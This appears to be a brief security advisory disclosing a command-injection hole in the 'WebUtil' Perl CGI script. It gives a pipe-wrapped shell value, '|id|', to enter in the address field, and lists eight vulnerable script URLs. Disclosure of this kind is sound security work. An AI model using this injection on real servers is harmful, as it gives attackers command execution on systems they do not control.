Name : remote command execution vulnerability Problem: WebUtil - A collection of net commands by The Puppet Master. A hole can lead to command execution on remote server running this perl script. Exploit: Access this sites and type "|id|" in "Web Name or IP Address:" form field. http://server/cgi-bin/webutil.pl?ping http://server/cgi-bin/webutil.pl?traceroute http://server/cgi-bin/webutil.pl?whois http://server/cgi-bin/webutil.pl?finger http://server/cgi-bin/webutil.pl?nslookup http://server/cgi-bin/webutil.pl?host http://server/cgi-bin/webutil.pl?dnsquery http://server/cgi-bin/webutil.pl?calendar Narrow (nss@privacyx.com)